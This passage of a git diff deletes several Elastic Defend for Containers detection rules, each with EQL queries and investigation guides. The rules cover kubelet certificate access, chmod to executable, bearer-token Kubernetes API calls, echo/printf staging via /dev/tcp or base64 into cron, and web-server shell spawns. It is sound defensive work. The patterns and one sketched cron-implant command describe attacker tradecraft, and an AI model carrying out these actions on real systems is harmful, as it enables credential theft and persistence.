-- A legitimate containerized node-management or diagnostic workflow that runs interactively (e.g., invoked manually for verification) may open files under `/var/lib/kubelet/pki/` as part of validating kubelet certificate presence/permissions after upgrades, certificate rotation, or node reconfiguration. - -### Response and remediation - -- Immediately isolate the affected workload by scaling the pod/controller to zero or cordoning and draining the node if a privileged pod has host access to `/var/lib/kubelet/pki/`, and preserve the container filesystem and process list for forensics before teardown. -- Remove the execution path that enabled access by deleting or patching the pod/DaemonSet to drop `privileged`, `hostPID/hostNetwork`, and any `hostPath` mounts that expose `/var/lib/kubelet` and redeploy only from a known-good image and manifest. -- Rotate and reissue kubelet client certificates/keys on the impacted node(s) (or replace the node from autoscaling/immutable infrastructure) and verify the old credentials can no longer authenticate to the Kubernetes API server. -- Review Kubernetes API server audit logs for activity using the node identity around the access time (cluster-wide discovery, secret reads, token reviews, exec into other pods) and revoke/rotate any exposed service account tokens or secrets accessed during the window. -- Escalate to the Kubernetes platform/on-call security team immediately if the files include a kubelet client key, if the pod was privileged or had host mounts, or if API audit logs show node credential use from unexpected sources or unusual resource enumeration. -- Harden the cluster by enforcing policies that block hostPath access to `/var/lib/kubelet` and privileged pods (Pod Security Admission/Gatekeeper/Kyverno), limiting interactive exec/attach via RBAC, and monitoring for subsequent access attempts to kubelet PKI paths and related credential exfiltration tooling. 
-"""
-references = [
- "https://heilancoos.github.io/research/2025/12/16/kubernetes.html#kubelet-api",
- "https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster",
- "https://www.aquasec.com/blog/kubernetes-exposed-exploiting-the-kubelet-api/"
-]
-risk_score = 21
-rule_id = "42de0740-8ed8-4b8b-995c-635b56a8bbf4"
-severity = "low"
-tags = ["Tactic: Credential Access", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
-timestamp_override = "event.ingested"
-type = "eql"
-query = '''
-any where host.os.type == "linux" and process.interactive == true and container.id like "*" and (
- (event.category == "file" and event.type == "change" and event.action == "open" and file.path like "/var/lib/kubelet/pki/*") or
- (event.category == "process" and event.type == "start" and event.action == "exec" and
- (
- process.name in ("cat", "head", "tail", "more", "less", "sed", "awk") or
- process.args in (
- "cat", "/bin/cat", "/usr/bin/cat", "/usr/local/bin/cat",
- "head", "/bin/head", "/usr/bin/head", "/usr/local/bin/head",
- "tail", "/bin/tail", "/usr/bin/tail", "/usr/local/bin/tail",
- "more", "/bin/more", "/usr/bin/more", "/usr/local/bin/more",
- "less", "/bin/less", "/usr/bin/less", "/usr/local/bin/less",
- "sed", "/bin/sed", "/usr/bin/sed", "/usr/local/bin/sed",
- "awk", "/bin/awk", "/usr/bin/awk", "/usr/local/bin/awk"
- )
- ) and process.args like "*/var/lib/kubelet/pki/*")
-)
-'''
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1552.004"
-name = "Private Keys"
-reference = "https://attack.mitre.org/techniques/T1552/004/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/integrations/cloud_defend/defense_evasion_suspicious_file_made_executable_via_chmod_inside_a_container.toml b/rules/integrations/cloud_defend/defense_evasion_suspicious_file_made_executable_via_chmod_inside_a_container.toml
deleted file mode 100644
index 10daf2c1993..00000000000
--- a/rules/integrations/cloud_defend/defense_evasion_suspicious_file_made_executable_via_chmod_inside_a_container.toml
+++ /dev/null
@@ -1,103 +0,0 @@ -[metadata] -creation_date = "2023/04/26" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects when chmod is used to add the execute permission to a file inside a container. Modifying file -permissions to make a file executable could indicate malicious activity, as an attacker may attempt to run unauthorized -or malicious code inside the container. -""" -from = "now-6m" -index = ["logs-cloud_defend.file*", "logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "File Execution Permission Modification Detected via Defend for Containers" -note = """## Setup - -## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating File Execution Permission Modification Detected via Defend for Containers - -Containers provide isolated environments for running applications, often on Linux systems. The `chmod` command is used to change file permissions, including making files executable. Adversaries may exploit this by altering permissions to execute unauthorized scripts or binaries, potentially leading to malicious activity. The detection rule identifies such actions by monitoring for `chmod` usage that grants execute permissions, focusing on specific permission patterns, and excluding benign cases. This helps in identifying potential threats where attackers attempt to execute unauthorized code within containers. 
- -### Possible investigation steps - -- Review the container ID associated with the alert to identify the specific container where the `chmod` command was executed. -- Examine the process arguments to determine the exact permissions that were set and identify the file that was made executable. -- Investigate the origin of the `chmod` command by reviewing the process tree to understand which parent process initiated it and whether it aligns with expected behavior. -- Check the user account or service account that executed the `chmod` command to assess if it has legitimate access and reason to modify file permissions. -- Analyze the file that was made executable to determine its contents and origin, checking for any signs of unauthorized or malicious code. -- Correlate this event with other logs or alerts from the same container to identify any patterns or additional suspicious activities that might indicate a broader attack. - -### False positive analysis - -- Routine maintenance scripts or automated processes may use chmod to set execute permissions on files within containers. To handle these, identify and whitelist specific scripts or processes that are known to be safe and necessary for operations. -- Development environments often involve frequent changes to file permissions as developers test and deploy code. Consider excluding specific container IDs or paths associated with development environments to reduce noise. -- Some container orchestration tools might use chmod as part of their normal operation. Review the processes and arguments associated with these tools and create exceptions for known benign activities. -- System updates or package installations within containers might trigger this rule. Monitor and document regular update schedules and processes, and exclude these from triggering alerts if they are verified as non-threatening. 
-- If certain users or roles are responsible for legitimate permission changes, consider excluding their activities by user ID or role, ensuring that these exclusions are well-documented and reviewed regularly. - -### Response and remediation - -- Immediately isolate the affected container to prevent further execution of unauthorized code. This can be done by stopping the container or disconnecting it from the network. -- Conduct a thorough review of the container's file system to identify any unauthorized or suspicious files that have been made executable. Remove or quarantine these files as necessary. -- Analyze the container's logs to trace the source of the `chmod` command and determine if there are any other indicators of compromise or related malicious activities. -- If the unauthorized execution is confirmed, assess the potential impact on the host system and other containers. Implement additional security measures, such as enhanced monitoring or network segmentation, to protect other assets. -- Escalate the incident to the security operations team for further investigation and to determine if the threat is part of a larger attack campaign. -- Review and update container security policies to prevent unauthorized permission changes, such as implementing stricter access controls and using security tools that enforce policy compliance. 
-- Enhance detection capabilities by configuring alerts for similar suspicious activities, ensuring that any future attempts to modify file permissions within containers are promptly identified and addressed."""
-references = [
- "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware",
-]
-risk_score = 21
-rule_id = "ec604672-bed9-43e1-8871-cf591c052550"
-severity = "low"
-tags = ["Tactic: Defense Evasion", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
-timestamp_override = "event.ingested"
-type = "eql"
-query = '''
-any where event.category in ("file", "process") and event.type in ("change", "creation", "start") and (
- process.name == "chmod" or
- (
- /* account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */
- process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and
- process.args in (
- "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod"
- ) and
- /* default exclusion list to not FP on default multi-process commands */
- not process.args in (
- "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which",
- "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man"
- )
- )
-) and process.args in ("4755", "755", "777", "0777", "444", "+x", "a+x") and
-container.id like "?*" and not process.args == "-x"
-'''
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1222"
-name = "File and Directory Permissions Modification"
-reference = "https://attack.mitre.org/techniques/T1222/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1222.002"
-name = "Linux and Mac File and Directory Permissions Modification"
-reference = "https://attack.mitre.org/techniques/T1222/002/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/cloud_defend/discovery_direct_interactive_kubernetes_api_request.toml b/rules/integrations/cloud_defend/discovery_direct_interactive_kubernetes_api_request.toml
deleted file mode 100644
index 6b067f4f645..00000000000
--- a/rules/integrations/cloud_defend/discovery_direct_interactive_kubernetes_api_request.toml
+++ /dev/null
@@ -1,143 +0,0 @@ -[metadata] -creation_date = "2026/01/21" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects the execution of direct interactive Kubernetes API requests inside a container. An adversary may -need to execute direct interactive Kubernetes API requests to gain access to the Kubernetes API server or other resources -within the cluster. These requests are often used to enumerate the Kubernetes API server or other resources within the -cluster, and may indicate an attempt to move laterally within the cluster. Note that this rule may not trigger if the -token is expanded within the process argument list, as the length of the "process.args" field may lead to the field being -ignored. -""" -false_positives = [ - """ - There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes, - such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine - if they are indicative of malicious activity or part of legitimate container activity. - """, -] -from = "now-6m" -index = ["logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Direct Interactive Kubernetes API Request Detected via Defend for Containers" -note = """ ## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. 
- -### Investigating Direct Interactive Kubernetes API Request Detected via Defend for Containers - -The rule flags interactive use of curl, wget, openssl, busybox ssl_client, socat/ncat, or kubectl from inside a container to call the Kubernetes API with a bearer token, often with custom CA or insecure TLS options. An operator enumerates cluster resources and tests access with in-pod credentials, enabling lateral movement or privilege escalation; after landing in a pod, they read the service account token and query the API to list namespaces, pods, or secrets, or issue kubectl get/patch to probe or modify workloads. - -### Possible investigation steps - -- Map the container ID to its pod, namespace, node, image, and owning controller, and confirm whether this workload is expected to make direct Kubernetes API calls or allow interactive access. -- Determine how the interactive session was initiated and by whom by correlating with Kubernetes events and audit logs for exec/attach/ephemeral-container activity and runtime logs for TTY sessions, including the initiating principal and source IP. -- Correlate with API server audit logs to retrieve the exact requests (verbs, resources, namespaces), the authenticated subject (service account or user), and response codes to identify any successful access to sensitive resources like Secrets or workload-modifying actions. -- Inspect the pod for credential use and operator traces by checking recent process activity, shell history, environment variables, and access to service account token or kubeconfig files at expected mount paths. -- Assess scope and potential persistence by listing recent cluster objects created or modified by the same identity across namespaces (Pods, CronJobs, RoleBindings, Secrets) within the timeframe around the alert. 
- -### False positive analysis - -- An administrator used kubectl interactively within a maintenance container to run get/list/patch commands during routine operations such as inspecting pods or updating labels, which matches expected administrative behavior. -- A developer ran openssl s_client, socat with SSL, or ncat --ssl interactively from within the container to troubleshoot TLS connectivity to a service endpoint, not the Kubernetes API server, causing the rule to fire despite benign intent. - -### Response and remediation - -- Immediately delete the affected pod to terminate interactive access, and apply a temporary NetworkPolicy in its namespace that blocks egress to the default/kubernetes service (API server) while you patch its ServiceAccount to set automountServiceAccountToken: false. -- Use API server audit logs and kubectl to enumerate actions taken by the pod’s ServiceAccount and revert any unauthorized objects it created or modified (Pods, CronJobs, RoleBindings, Secrets), and remove any attached ephemeral containers across the namespace. -- Rotate credentials and restore workloads by deleting any legacy ServiceAccount token Secret, restarting pods to issue new bound tokens, rebuilding the image from a trusted base, and redeploying with read-only rootfs and minimal RBAC verified via kubectl auth can-i. -- Escalate to incident response if audit logs show Secrets access or create/patch/update on workloads, if the ServiceAccount holds cluster-admin, or if the observed commands used curl -k/--insecure, wget --no-check-certificate, or openssl/socat/ncat with SSL to the API server. -- Harden the cluster by enforcing admission controls that deny kubectl exec/attach for non-admins, requiring automountServiceAccountToken: false by default and short-lived bound tokens where needed, restricting NetworkPolicies so only designated controllers can reach the API server, and adopting distroless images that omit curl/wget/openssl/ncat. 
-""" -risk_score = 21 -rule_id = "26a989d2-010e-4dae-b46b-689d03cc22b3" -severity = "low" -tags = ["Tactic: Discovery", "Tactic: Lateral Movement", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( - ( - process.name == "curl" and - process.args in ("-H", "--header") and - process.args like "*Authorization: Bearer *" and - ( - /* CA-specified */ - process.args in ("--cacert", "--capath") or - /* insecure */ - process.args in ("-k", "--insecure") - ) - ) or - ( - process.name == "wget" and - process.args like "--header*" and - process.args like "*Authorization: Bearer *" and - ( - /* CA-specified */ - process.args == "--ca-certificate" or - /* insecure */ - process.args == "--no-check-certificate" - ) - ) or - ( - /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ - process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and - process.args in ("wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget") and - process.args like "--header*" and - process.args like "*Authorization: Bearer*" and - process.args == "--no-check-certificate" - ) or - ( - /* ssl_client is busybox-specific, so we need to handle it separately */ - process.name == "busybox" and - process.args == "ssl_client" and - process.args like "*Authorization: Bearer*" - ) or - (process.name == "openssl" and process.args == "s_client" and process.args == "-connect") or - (process.name == "socat" and process.args like~ "*ssl*") or - (process.name == "ncat" and process.args like "--ssl*") or - (process.name == "kubectl" and process.args in ("get", "list", "watch", "create", "patch", "update")) -) and -process.interactive == true and container.id 
like "*"
-'''
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
-
-[rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1550.001"
-name = "Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1550/001/"
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules/integrations/cloud_defend/execution_suspicious_echo_or_printf_execution.toml b/rules/integrations/cloud_defend/execution_suspicious_echo_or_printf_execution.toml
deleted file mode 100644
index c6a0847d380..00000000000
--- a/rules/integrations/cloud_defend/execution_suspicious_echo_or_printf_execution.toml
+++ /dev/null
@@ -1,174 +0,0 @@ -[metadata] -creation_date = "2026/02/10" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects the execution of the echo/printf command to write data to potential persistence files, decode base64/32/16 and -hex content or establish connections to a potential C2. The echo/printf commands are used to display a line of text or write data -to a file. Threat actors may abuse the echo/printf commands to write data to files or file descriptors that are executed (by -other processes or services) to establish persistence or escalate privileges. -""" -from = "now-6m" -index = ["logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Suspicious Echo or Printf Execution Detected via Defend for Containers" -note = """## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Suspicious Echo or Printf Execution Detected via Defend for Containers - -This rule flags interactive shell commands that invoke echo or printf with patterns used to write or stage data into sensitive paths, decode encoded payloads, or reach out via /dev/tcp. Attackers use these lightweight built-ins to avoid dropping tools while creating persistence or privilege escalation by modifying cron, rc.local, sudoers, ld.so preload, or SSH authorized_keys. In a container, a common pattern is execing into a pod and running `sh -c 'printf | base64 -d > /etc/cron.d/job; chmod +x …'` to implant a scheduled backdoor. 
- -### Possible investigation steps - -- Review the full command line, parent/child process tree, and session metadata to determine who initiated the interactive exec and whether it was an expected administrative action. -- Extract any encoded strings or redirected output from the command and safely decode/pretty-print it to identify dropped scripts, keys, cron entries, or additional staging commands. -- Inspect the referenced destination paths (and their symlink targets) for recent modifications, unexpected permissions/ownership changes, and persistence artifacts such as cron jobs, rc.local edits, ld.so preload configs, sudoers changes, or SSH authorized_keys additions. -- Determine whether the write target resides on a mounted volume shared with the host or other pods, and assess blast radius by checking for the same artifact across replicas/namespaces and CI/CD deployment history. -- Correlate around the execution time for follow-on activity such as outbound connections (including /dev/tcp usage), subsequent interpreter launches, or cleanup actions, and contain by isolating/pausing the workload if malicious behavior is confirmed. - -### False positive analysis - -- An administrator interactively execs into a container during troubleshooting and uses `echo`/`printf` with redirection (and possibly `chmod`) to make a temporary or emergency change in paths like `/etc/profile`, `/etc/update-motd.d`, `/etc/ssh*`, or `~/.ssh/*` to restore access or correct misconfiguration. -- A developer interactively execs into a container to create and run a short diagnostic artifact by using `echo`/`printf` to write into `/tmp` or `/dev/shm`, decode embedded `base64`/hex content, or validate network reachability via `/dev/tcp`, which can resemble staging/persistence behavior. 
- -### Response and remediation - -- Isolate the affected pod/container by removing it from service (scale to zero or cordon/deny ingress-egress) and, if needed, pause it to preserve the filesystem state before it can overwrite or delete staged artifacts. -- Capture and preserve evidence by exporting the full shell command string and taking a filesystem snapshot/copy of any touched paths such as `/etc/cron*`, `/etc/rc.local`, `/etc/init.d`, `/etc/ld.so*`, `/etc/sudoers*`, and `~/.ssh/authorized_keys`, plus any files created in `/tmp`, `/var/tmp`, or `/dev/shm`. -- Eradicate persistence by removing unauthorized cron entries, rc.local/init scripts, sudoers/ld.so preload modifications, and injected SSH keys, then rotate any exposed credentials and redeploy the workload from a known-good image rather than “cleaning” the live container. -- Recover safely by rebuilding the image with patched dependencies, rolling out a fresh deployment, and validating that no replicas or shared volumes contain the same dropped scripts/keys or modified configuration files. -- Escalate immediately to incident response if the command decodes payloads (base64/base32/hex), writes into system startup/auth paths, invokes an interpreter via a pipe (e.g., `| sh/python/perl/php`), or uses `/dev/tcp` for outbound connectivity, as these indicate active staging or C2 behavior. 
-- Harden against recurrence by restricting interactive exec access, enforcing read-only root filesystems and least-privilege mounts, blocking writes to sensitive paths via policy, and adding egress controls to prevent `/dev/tcp`-style callbacks.""" -references = [ - "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware", -] -risk_score = 73 -rule_id = "d9bfa475-270d-4b07-93cb-b1f49abe13da" -severity = "high" -tags = ["Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -process where event.type == "start" and event.action == "exec" and process.interactive == true and -process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and -process.args in ("-lc", "-c", "-cl") and process.args like ("*echo *", "*printf *") and -process.args like ( - "*/etc/cron*", "*/etc/rc.local*", "*/dev/tcp/*", "*/etc/init.d*", "*/etc/update-motd.d*", - "*/etc/ld.so*", "*/etc/sudoers*", "*base64 *", "*base32 *", "*base16 *", "*/etc/profile*", - "*/dev/shm/*", "*/etc/ssh*", "*/home/*/.ssh/*", "*/root/.ssh*" , "*~/.ssh/*", "*xxd *", - "*/etc/shadow*", "* /tmp/*", "* /var/tmp/*", "* /dev/shm/* ", "* ~/*", "* /home/*", - "* /run/*", "* /var/run/*", "*|*sh", "*|*python*", "*|*php*", "*|*perl*", "*|*busybox*", - "*/var/www/*", "*>*", "*;*", "*chmod *", "*rm *", "*openssl enc*" -) and container.id like "?*" -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = 
"TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - -[[rule.threat.technique.subtechnique]] -id = "T1037.004" -name = "RC Scripts" -reference = "https://attack.mitre.org/techniques/T1037/004/" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.004" -name = "Unix Shell Configuration Modification" -reference = "https://attack.mitre.org/techniques/T1546/004/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.003" 
-name = "Sudo and Sudo Caching" -reference = "https://attack.mitre.org/techniques/T1548/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/cloud_defend/execution_suspicious_webserver_child_process_execution.toml b/rules/integrations/cloud_defend/execution_suspicious_webserver_child_process_execution.toml deleted file mode 100644 index 03a60c061c0..00000000000 --- a/rules/integrations/cloud_defend/execution_suspicious_webserver_child_process_execution.toml +++ /dev/null 
@@ -1,275 +0,0 @@ -[metadata] -creation_date = "2026/02/06" -integration = ["cloud_defend"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects the exploitation of a web server through the execution of a suspicious process by common web server -user accounts. Attackers may upload a web shell to a web server to maintain access to the system. -""" -from = "now-6m" -index = ["logs-cloud_defend.process*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Web Server Exploitation Detected via Defend for Containers" -note = """## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Web Server Exploitation Detected via Defend for Containers - -This rule flags Linux container activity where a web server (or typical web-service account) executes a suspicious process, a strong indicator of web app exploitation rather than normal request handling. It matters because this pattern commonly marks initial foothold and post-exploitation execution that can lead to persistence and lateral movement from the service container. A typical attacker flow drops a web shell or abuses RCE to launch `sh -c` and pull or run a secondary payload (e.g., reverse shell). - -### Possible investigation steps - -- Capture the full executed command line and decode/normalize any obfuscation (base64, hex, URL encoding) to determine the operator intent and any payload retrieval or reverse-shell behavior. 
-- Correlate the execution timestamp with web access/error logs and ingress/WAF events to identify the triggering request path, parameters, and source IP/user-agent indicating RCE or web-shell invocation. -- Inspect recent file and permission changes in the container’s application and web directories (including temp and upload paths) to identify newly dropped scripts/binaries, cron entries, or modified server configs. -- Review container and orchestration context (image tag/digest, recent deploys, exec sessions, and Kubernetes events) to determine whether the activity aligns with a legitimate rollout or represents in-container compromise. -- Check network telemetry for the container around the event for suspicious outbound connections, DNS lookups, or downloads, then pivot to any contacted hosts to assess command-and-control or staging infrastructure. - -### False positive analysis - -- A web application or server-side script running under the web-service account legitimately invokes `sh -c` (e.g., to run maintenance tasks like log rotation, cache rebuilds, file conversions, or templating/asset compilation) from a web directory such as `/var/www/*`, causing the web server to spawn a shell child process. -- During container startup or a deployment/health-check routine, the web server process launches a shell via `sh -c` to perform initialization (e.g., environment substitution, dynamic configuration generation, permission fixes, or calling bundled helper scripts), which can resemble exploitation when the parent is a web server and the child is a shell. - -### Response and remediation - -- Immediately isolate the affected container/pod from inbound and outbound traffic (quarantine namespace/security group or apply a deny-all NetworkPolicy) and stop the workload to prevent further `sh -c` execution and potential C2. 
-- Preserve evidence by exporting the container filesystem and logs (web access/error logs, application logs, and process output) and capture the exact shell command string and any downloaded payloads or newly created files in web roots, temp, and upload directories. -- Eradicate by removing any identified web shells/backdoors and reverting unauthorized changes, then rebuild and redeploy the service from a known-good image digest while rotating secrets exposed to the container (service tokens, database creds, API keys). -- Recover by validating application integrity and behavior post-redeploy (no unexpected shell spawns, no abnormal outbound connections, clean health checks) and monitor the previously contacted IPs/domains for further callbacks from other workloads. -- Escalate to incident response and platform security immediately if the shell command indicates payload retrieval, reverse shell activity, credential access, or if similar `sh -c` executions are observed across multiple containers/namespaces. 
-- Harden by removing shell binaries from runtime images where feasible, enforcing non-root and read-only filesystems, restricting egress to required destinations only, disabling risky interpreter execution paths in the web app, and adding WAF/RCE protections for the identified vulnerable endpoint.""" -risk_score = 73 -rule_id = "497a7091-0ebd-44d7-88c4-367ab4d4d852" -severity = "high" -tags = ["Tactic: Execution", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -process where event.type == "start" and event.action == "exec" and process.parent.interactive == false and -container.id like "?*" and ( - process.parent.name in ( - "nginx", "apache2", "httpd", "caddy", "mongrel_rails", "uwsgi", "daphne", "httpd.worker", "flask", - "php-cgi", "php-fcgi", "php-cgi.cagefs", "lswsctrl", "varnishd", "uvicorn", "waitress-serve", "starman" - ) or - process.parent.name like ("php-fpm*", "gunicorn*", "*.cgi", "*.fcgi") or - (process.parent.name like "ruby*" and process.parent.args like~ ("*puma*", "*rails*", "*passenger*")) or - (process.parent.name like "python*" and process.parent.args like~ ( - "*hypercorn*", "*flask*", "*uvicorn*", "*django*", "*app.py*", "*server.py*", "*wsgi.py*", "*asgi.py*" - )) or - (process.parent.name like "perl*" and process.parent.args like~ "*plackup*") or - (process.parent.name == "node" and process.parent.args like~ ( - "*next start*", "*--port*", "*PORT=*", "*HOST=*", "*0.0.0.0*", "*/dist/*.js*", "*/build/*.js*", "*/server/*.js*", - "*/app/*.js*","*/apps/*/*.js*", "*/index.js*", "*/main.js*", "*/srv/*", "*/opt/*", "*/var/www/*" - ) and - not process.parent.args like ("/opt/cursor-agent/*", "/home/*/*", "/root/*", "/opt/vscode-server/*", "/usr/lib/node_modules/openclaw/dist/index.js") - ) or - (process.parent.name == "java" and 
process.parent.args like~ ( - /* Tomcat */ - "org.apache.catalina.startup.Bootstrap", "-Dcatalina.base=*", - - /* Jetty */ - "org.eclipse.jetty.start.Main", "-Djetty.home=*", - - /* WildFly / JBoss */ - "org.jboss.modules.Main", "-Djboss.home.dir=*", - - /* WebLogic */ - "weblogic.Server", "-Dweblogic.Name=*", "*weblogic-launcher.jar*", - - /* WebSphere traditional + Liberty */ - "com.ibm.ws.runtime.WsServer", "com.ibm.ws.kernel.boot.cmdline.Bootstrap", - - /* GlassFish */ - "com.sun.enterprise.glassfish.bootstrap.ASMain", - - /* Resin */ - "com.caucho.server.resin.Resin", - - /* Spring Boot */ - "org.springframework.boot.loader.*", - - /* Quarkus */ - "*quarkus-run.jar*", "io.quarkus.runner.GeneratedMain", - - /* Micronaut */ - "io.micronaut.runtime.Micronaut", - - /* Dropwizard */ - "io.dropwizard.cli.ServerCommand", - - /* Play */ - "play.core.server.ProdServerStart", - - /* Helidon */ - "io.helidon.microprofile.server.Main", "io.helidon.webserver*", - - /* Vert.x */ - "io.vertx.core.Launcher", - - /* Keycloak */ - "org.keycloak*", - - /* Apereo CAS */ - "org.apereo.cas*", - - /* Elasticsearch */ - "org.elasticsearch.bootstrap.Elasticsearch", - - /* Atlassian / Gerrit */ - "com.atlassian.jira.startup.Launcher", "*BitbucketServerLauncher*", "com.google.gerrit.pgm.Daemon", - - /* Solr */ - "*-Dsolr.solr.home=*" - ) - ) -) and -process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and -process.args in ("-c", "-cl", "-lc") and ( - process.args like ( - /* Suspicious Paths */ - "* /tmp/* ", "* /var/tmp/* ", "* /dev/shm/*", "* /var/www/*", "* /run/*", "* /var/run/*", - - /* Interpreter Execution */ - "*python* -c*", "*php* -r*", "*perl* -e*", 